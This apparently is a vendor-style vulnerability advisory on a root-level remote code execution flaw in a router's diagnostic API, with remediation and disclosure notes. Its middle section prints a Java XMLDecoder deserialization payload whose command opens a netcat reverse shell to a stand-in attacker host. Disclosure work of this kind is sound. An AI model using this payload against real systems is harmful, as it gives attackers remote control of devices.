Vulnerability Overview
During a targeted infrastructure assessment, the OdiVex Threat Research Team identified a critical vulnerability in the administrative daemon of the DataStream Enterprise Router (versions 4.1.0 through 4.5.2). The vulnerability allows an unauthenticated, remote attacker to execute arbitrary system commands with root privileges.
The Exploit Mechanism
The daemon exposes a diagnostic API endpoint on port 8443 that improperly deserializes untrusted XML payloads sent via HTTP POST requests. By crafting a specific XML External Entity (XXE) chain that pivots into the Java-based backend routing engine, we bypassed the initial authentication filter.
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<array class="java.lang.String" length="3">
<void index="0"><string>/bin/sh</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>nc -e /bin/sh attacker.com 4444</string></void>
</array>
</void>
</object>
</java>
Remediation & Disclosure
OdiVex worked directly with DataStream under a coordinated disclosure timeline. Administrators are urged to update to firmware version 4.5.3 immediately and restrict port 8443 access to internal management VLANs.